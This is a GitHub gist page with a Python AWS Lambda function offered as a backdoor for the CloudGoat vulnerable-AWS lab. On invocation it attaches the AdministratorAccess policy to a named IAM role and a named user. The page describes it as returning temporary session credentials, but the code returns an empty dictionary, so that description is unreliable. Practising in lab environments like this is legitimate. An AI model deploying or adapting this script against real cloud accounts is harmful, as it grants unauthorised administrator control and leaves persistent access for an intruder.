-
-
Save sasqwatch/bd0e1e08d6c000d81b0ad29b1a4167cf to your computer and use it in GitHub Desktop.
Lambda that backdoors CloudGoat's lambda-dynamodb-cloudgoat role by granting it an AdministratorAccess managed role. As soon as this Lambda gets invoked by HTTP event - it will return temporary AWS session credentials.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import boto3 | |
| import json | |
| POLICIES_TO_ATTACH = [ | |
| 'arn:aws:iam::aws:policy/AdministratorAccess', | |
| ] | |
| ROLE_TO_BACKDOOR = 'lambda-dynamodb-cloudgoat' | |
| USER_TO_BACKDOOR = 'joe' | |
| def endpoint(event, context): | |
| iam = boto3.client('iam') | |
| resp = {} | |
| try: | |
| for pol in POLICIES_TO_ATTACH: | |
| iam.attach_role_policy( | |
| RoleName = ROLE_TO_BACKDOOR, | |
| PolicyArn = pol | |
| ) | |
| print('[+] Attached policy ({}) to role ({})'.format(pol, ROLE_TO_BACKDOOR)) | |
| except Exception as e: | |
| print('[!] Backdooring role failed: "{}"'.format(str(e))) | |
| try: | |
| for pol in POLICIES_TO_ATTACH: | |
| iam.attach_user_policy( | |
| UserName = USER_TO_BACKDOOR, | |
| PolicyArn = pol | |
| ) | |
| print('[+] Attached policy ({}) to role ({})'.format(pol, ROLE_TO_BACKDOOR)) | |
| except Exception as e: | |
| print('[!] Backdooring user failed: "{}"'.format(str(e))) | |
| return resp |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment